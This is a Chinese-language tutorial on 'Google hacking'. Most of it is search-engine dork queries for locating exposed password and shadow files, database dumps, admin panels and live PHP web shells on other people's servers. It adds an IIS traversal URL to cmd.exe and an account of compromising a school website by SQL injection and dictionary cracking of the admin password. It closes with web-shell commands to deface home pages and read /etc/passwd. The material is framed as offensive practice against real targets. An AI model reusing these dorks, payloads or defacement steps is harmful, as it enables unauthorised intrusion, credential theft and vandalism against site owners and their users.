Google高级技巧—google Hack★★★★

google hacking事实上并算不上什么新东西,当时并没有重视这样的技术,觉得webshell什么的,并无太大实际用途.google hacking事实上并非如此简单...
经常使用的googlekeyword：
foo1 foo2 (也就是关联，比方搜索xx公司 xx美女)
operator:foo
filetype:123 类型
site:foo.com 相对直接看网站更有意思，能够得到很多意外的信息
intext:foo
intitle: fooltitle 标题哦
allinurl:foo 搜索xx网站的全部相关连接。（踩点必备）
links:foo 不要说就知道是它的相关链接
allintilte:foo.com

我们能够辅助"-" "+"来调整搜索的精确程度
直接搜索password：(引號表示为精确搜索)
当然我们能够再延伸到上面的结果里进行二次搜索
"index of" htpasswd / passwd
filetype:xls username password email
"ws_ftp.log"
"config.php"
allinurl:admin mdb
service filetype:pwd ....或者某个比方pcanywhere的password后缀cif等
越来越有意思了，再来点更敏感信息
"robots.txt" "Disallow:" filetype:txt
inurl:_vti_cnf (FrontPage的关键索引啦，扫描器的CGI库一般都有地)
allinurl: /msadc/Samples/selector/showcode.asp
/../../../passwd
/examples/jsp/snp/snoop.jsp
phpsysinfo
intitle:index of /admin
intitle:"documetation"
inurl: 5800(vnc的端口)或者desktop port等多个keyword检索
webmin port 10000
inurl:/admin/login.asp
intext:Powered by GBook365
intitle:"php shell*" "Enable stderr" filetype:php 直接搜索到phpwebshell
foo.org filetype:inc

ipsec filetype:conf
intilte:"error occurred" ODBC request where (select|insert) 说白了就是说，能够直接试着查查数据库检索，针对眼下流行的sql注射，会发达哦
"Dumping data for table" username password
intitle:"Error using Hypernews"
"Server Software"
intitle:"HTTP_USER_AGENT=Googlebot"
"HTTP_USER_ANGET=Googlebot" THS ADMIN
filetype:.doc site:.mil classified 直接搜索军方相关word
检查多个keyword：
intitle:config confixx login password
"mydomain.com" nessus report
"report generated by"
"ipconfig"
"winipconfig"
google缓存利用（hoho，最有影响力的东西）推荐大家搜索时候多"选搜索全部网站"
特别推荐：administrator users 等相关的东西，比方名字，生日等……最慘也能够拿来做字典嘛

……

一些技巧集合：
1) index.of.password
1) filetype:blt "buddylist"
2) "access denied for user" "using password"
2) intitle:"index of" inurl:ftp (pub | incoming)
3) "http://*:*@www" domainname
3) filetype:cnf inurl:_vti_pvt access.cnf
4) auth_user_file.txt
4) allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
5) The Master List
5) inurl:"install/install.php"
6) allinurl: admin mdb
6) intitle:"welcome.to.squeezebox"
7) passlist.txt (a better way)
7) intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
8) "A syntax error has occurred" filetype:ihtml
8) intitle:Login intext:"RT is ? Copyright"
9) "# -FrontPage-" inurl:service.pwd
9) ext:php program_listing intitle:MythWeb.Program.Listing
10) orA-00921: unexpected end of SQL command
10) intitle:index.of abyss.conf
NO2:
--------------------------------------------------------------------------------
google hacking的简单实现
使用google中的一些语法能够提供给我们很多其它的信息(当然也提供给那些习惯攻击的人很多其它他们所想要的.),以下就来介绍一些经常使用的语法.
intext:
这个就是把网页中的正文内容中的某个字符做为搜索条件.比如在google里输入:intext:动网.将返回全部在网页正文部分包括"动网"的网页.allintext:用法和intext相似.
intitle:
和上面那个intext差点儿相同,搜索网页标题中是否有我们所要找的字符.比如搜索:intitle:安全天使.将返回全部网页标题中包括"安全天使"的网
页.同理allintitle:也同intitle相似.
cache:
搜索google里关于某些内容的缓存,有时候或许能找到一些好东西哦.
define:
搜索某个词语的定义,搜索:define:hacker,将返回关于hacker的定义.
filetype:
这个我要重点推荐一下,不管是撒网式攻击还是我们后面要说的对特定目标进行信息收集都须要用到这个.搜索指定类型的文件.比如输入
:filetype:doc.将返回全部以doc结尾的文件URL.当然假设你找.bak、.mdb或.inc也是能够的,获得的信息或许会更丰富:)
info:
查找指定网站的一些基本信息.
inurl:
搜索我们指定的字符是否存在于URL中.比如输入:inurl:admin,将返回N个相似于这样的连接http://www.xxx.com/xxx/admin,用来找管理员登
陆的URL不错.allinurl也同inurl相似,可指定多个字符.
link:
比如搜索:inurl:www.4ngel.net能够返回全部和www.4ngel.net做了链接的URL.
site:
这个也非常实用,比如:site:www.4ngel.net.将返回全部和4ngel.net这个站有关的URL.

对了另一些*作符也是非常实用的:
+ 把google可能忽略的字列如查询范围
- 把某个字忽略
~ 允许词
. 单一的通配符
* 通配符，可代表多个字母
"" 精确查询
以下開始说说实际应用
以下内容均在google上搜索,对于一个居心叵測的攻击者来说,可能他最感兴趣的就是password文件了.而google正由于其强大的搜索能力往往会
把一些敏感信息透露给他们.用google搜索以下内容:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
有时候由于各种各样的原因一些重要的password文件被毫无保护的暴露在网络上,假设被别实用心的人获得,那么危害是非常大的

相同能够用google来搜索一些具有漏洞的程序,比如ZeroBoard前段时间发现个文件代码泄露漏洞,能够用google来找网上使用这套程序的网站:
intext:ZeroBoard filetype:php
或者使用:
inurl:outlogin.php?_zb_path= site:.jp
来寻找我们所须要的页面.phpmyadmin是一套功能强大的数据库*作软件,一些网站由于配置失误,导致我们能够不使用password直接对phpmyadmin进行*作.我们能够用google搜索存在这样漏洞的程序URL:
intitle:phpmyadmin intext:Create new database
还http://www.xxx.com/_vti_bin/..%5C..%5C..%5C..%5C..%5C../winnt/system32/cmd.exe? dir吗?用google找找，你或许还能够找到非常多古董级的机器。相同我们能够用这个找找有其它cgi漏洞的页面。
allinurl：winnt system32
前面已经简单的说过能够用google来搜索数据库文件,用上一些语法来精确查找能够获得很多其它东西(access的数据库,mssql、mysql的连接文件等等).举个样例演示样例一下:
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data //在一些配置不对的apache+win32的server上经常出现这样的情况,和上面的原理一样,我们还能够用google来找后台.

利用google全然是能够对一个网站进行信息收集和渗透的，以下我们用google对特定网站进行一次測试。
首先用google先看这个网站的一些基本情况(一些细节部分就略去了):
site:xxxx.com
从返回的信息中，找到几个该校的几个系院的域名：
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
顺便ping了一下，应该是在不同的server.学校一般都会有不少好的资料，先看看有什么好东西没
site:xxxx.com filetype:doc
得到N个不错的doc。
先找找网站的管理后台地址：
site:xxxx.com intext:管理
site:xxxx.com inurl:login
site:xxxx.com intitle:管理
超过获得2个管理后台地址：
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp
还算不错，看看server上跑的是什么程序：
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:.......
......
a2server用的应该是IIS，上面用的是asp的整站程序，另一个php的论坛
a3server也是IIS，aspx+asp。web程序都应该是自己开发的。有论坛那就看看能不能遇见什么公共的FTP帐号什么的：
site:a2.xxxx.com intext:ftp://*:*
没找到什么有价值的东西。再看看有没有上传一类的漏洞：
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
在a2上发现一个上传文件的页面：
http://a2.xxxx.com/sys/uploadfile.asp
用IE看了一下，没权限訪问。试试注射，
site:a2.xxxx.com filetype:asp
得到N个asp页面的地址，体力活就让软件做吧，这套程序明显没有对注射做什么防范，dbowner权限，尽管不高但已足矣，back a shell不太喜
欢，并且看起来数据库的个头就不小，直接把web管理员的password暴出来再说，MD5加密过。一般学校的网站的password都比較有规律，通常都是域名+
电话一类的变形，用google搞定吧。
site:xxxx.com //得到N个二级域名
site:xxxx.com intext:*@xxxx.com //得到N个邮件地址，还有邮箱的主人的名字什么的
site:xxxx.com intext:电话 //N个电话
把什么的信息做个字典吧，挂上慢慢跑。过了一段时间就跑出4个帐号，2个是学生会的，1个管理员，另一个可能是老师的帐号。登陆上去：
name：网站管理员
pass：a2xxxx7619 //说了吧，就是域名+4个数字
要再怎么提权那就不属于本文讨论訪问了，呵呵，到此为止。

这段时间在国外的一些google hack的研究网站看了看，事实上也都差点儿相同是一些基本的语法的灵活运用，或者配合某个脚本漏洞，主要还是靠
个人的灵活思维。国外对于google hack方面的防范也并非非常多，所以大家还是点到为止，不要去搞破坏拉，呵呵。对于一些在win上跑
apache的网管们应该多注意一下这方面，一个intitle:index of就差点儿相同都出来了:)
1.查找利用php webshell
intitle:"php shell*" "Enable stderr" filetype:php
(注: intitle—网页标题 Enable stderr—UNIX标准输出和标准错误的缩写filetype—文件类型)。搜索结果中，你能找到非常多直接在机器上执
行命令的web shell来。假设找到的PHPSHELL不会利用，假设你不熟悉UNIX，能够直接看看LIST，这里就不具体说了，有非常多利用价值。要说明
的是，我们这里搜索出来的一些国外的PHPSHELL上都要使用UNIX命令，都是system调用出来的函数(事实上用百度及其它搜索引擎都能够，仅仅是填
写搜索的内容不同)。这个PHPWEBSHELL是能够直接Echo(Unix经常使用命令)。一句话就把首页搞定了:

echo "召唤" > index.jsp

如今看看首页，已经被我们改成: "召唤" 了。
我们也能够用WGET上传一个文件上去(比方你要替换的叶子吧)。然后execute Command输入 cat file > index.html or echo "" > file
echo "test" >> file
这样一条条打出来，网站首页就成功被替换了。相同的也能够

uname -a;cat /etc/passwd
只是有点要注意，有些WEBSHELL程序有问题，运行不了的，
2.搜索INC敏感信息
在google的搜索框中填入:
Code:
.org filetype:inc
 

＝＝＝